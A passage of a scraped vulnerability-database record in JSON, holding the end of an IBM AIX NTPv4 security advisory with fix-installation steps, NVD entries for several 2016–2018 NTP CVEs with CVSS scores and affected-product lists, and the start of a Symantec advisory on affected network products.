000891c62f5e59c34909399d0ef4c74c72048a4fc1e7e50b66dedaa4fcf0ee87 IJ10280s3b.181206.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. \n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc.sig \n\n FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. Verify it is both bootable and readable before\n proceeding.\n\n The fix will not take affect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2018-12327,\n CVE-2018-7170)\n https://www-01.ibm.com/support/docview.wss?uid=ibm10744497\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Fri Dec 14 12:20:13 CST 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 3, "modified": "2018-12-14T12:20:13", "published": "2018-12-14T12:20:13", "id": "NTP_ADVISORY11.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc", "title": "There are vulnerabilities in NTPv4 that affect AIX.", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2021-02-02T06:52:41", "description": "ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549.", "edition": 11, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7170", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7170"], "modified": "2020-06-18T14:01:00", "cpe": ["cpe:/a:netapp:hci:-", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:solidfire:-"], "id": "CVE-2018-7170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7170", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the \"other side\" of an interleaved association causing the victim ntpd to reset its association.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7185", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7185"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:netapp:hci:-", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:solidfire:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7185", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3-rc1:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:-:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta2:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p2-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "Buffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-08T20:29:00", "title": "CVE-2018-7183", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7183"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:freebsd:freebsd:10.4", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/o:freebsd:freebsd:10.3", "cpe:/a:netapp:element_software:-", "cpe:/o:freebsd:freebsd:11.1", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7183", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7183", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.4:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:freebsd:freebsd:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:10.3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "The ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with a ntpd instance from 4.2.8p6 through 4.2.8p10.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7182", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7182"], "modified": "2019-10-31T19:15:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:netapp:element_software:-"], "id": "CVE-2018-7182", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7182", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:element_software:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:41", "description": "ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the \"received\" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-06T20:29:00", "title": "CVE-2018-7184", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7184"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:canonical:ubuntu_linux:17.10", "cpe:/a:synology:diskstation_manager:6.1", "cpe:/a:synology:router_manager:1.1", "cpe:/a:netapp:cloud_backup:-", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:synology:vs960hd_firmware:-", "cpe:/a:synology:virtual_diskstation_manager:-", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/a:ntp:ntp:4.2.8", "cpe:/a:synology:diskstation_manager:6.0", "cpe:/a:synology:diskstation_manager:5.2", "cpe:/a:netapp:steelstore_cloud_integrated_storage:-", "cpe:/a:synology:skynas:-", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2018-7184", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7184", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:synology:diskstation_manager:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:o:synology:vs960hd_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:a:synology:router_manager:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:synology:diskstation_manager:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p10:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p5:*:*:*:*:*:*", "cpe:2.3:a:synology:diskstation_manager:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:o:slackware:slackware_linux:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:synology:skynas:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p9:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:synology:virtual_diskstation_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:03", "description": "A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-06T21:59:00", "title": "CVE-2016-1549", "type": "cve", "cwe": ["CWE-19"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1549"], "modified": "2018-03-28T01:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-1549", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1549", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-01-15T20:46:38", "bulletinFamily": "software", "cvelist": ["CVE-2018-7170", "CVE-2018-7174", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "description": "### SUMMARY\n\nSymantec Network Protection products using affected versions of the NTP reference implementation from ntp.org are susceptible to multiple vulnerabilities. A remote attacker can exploit these vulnerabilities to execute arbitrary code, modify the target's system time, prevent the target from updating its system time, and cause denial of service through application crashes. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Content Analysis** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 2.4 and later | Not vulnerable, fixed in 2.4.1.1 \n2.3 | Upgrade to 2.3.5.1. \n2.1, 2.2 | Upgrade to a later version with fixes. \n \n \n\nDirector \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\n**Mail Threat Defense** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. \n \n \n\n**Management Center** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 2.1 and later | Not vulnerable, fixed in 2.1.1.1. \n1.11, 2.0 | Upgrade to a later version with fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7170, CVE-2018-7185 | 10.5 | Not vulnerable, fixed in 10.5.1.1 \n10.3, 10.4 (has vulnerable code, but not vulnerable to known vectors of attack) | Upgrade to a later version with fixes. \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 10.1, 10.2 | Upgrade to a later version with fixes. \nAll CVEs | 9.5 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7170 and CVE-2018-7185 | 7.2, 8.1, 8.2 | Not available at this time \n7.1, 7.3, 8.0 | Upgrade to later version with fixes. \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 7.2 | Not available at this time \n \n \n\n**SSL Visibility** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182 | 5.0 | Not vulnerable, fixed in 5.0.2.1. \n4.5 | Not vulnerable, fixed in 4.5.1.1. \n4.1, 4.2, 4.3, 4.4 | Upgrade to a later version with fixes. \n3.12 | Upgrade to a later version with fixes. \n3.11 | Upgrade to a later version with fixes. \n3.10 | Upgrade to a later version with fixes. \n3.8.4FC | Upgrade to a later version with fixes. \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-7170 | 1.13, 1.14 | Not available at this time \n1.12 | Upgrade to a later version with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7185 | 10.0, 11.0 | A fix will not be provided. \n \n \n\nThe following products contain a vulnerable version of the ntp.org NTP reference implementation, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.1 and later | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.4.2. \n6.6 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nSymantec Network Protection products do not enable or use all functionality within the ntp.org NTP reference implementation. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** all CVEs\n * **CA:** CVE-2018-7170 and CVE-2018-7185\n * **MTD:** CVE-2018-7170 and CVE-2018-7185\n * **MC:** CVE-2018-7170 and CVE-2018-7185\n * **Reporter:** CVE-2018-7170 and CVE-2018-7185\n * **SSLV:** all CVEs except CVE-2018-7182\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nSymantec HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMalware Analysis \nNorman Shark Industrial Control System Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nUnified Agent \n \n**\n\n### ISSUES\n\n**CVE-2018-7170** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 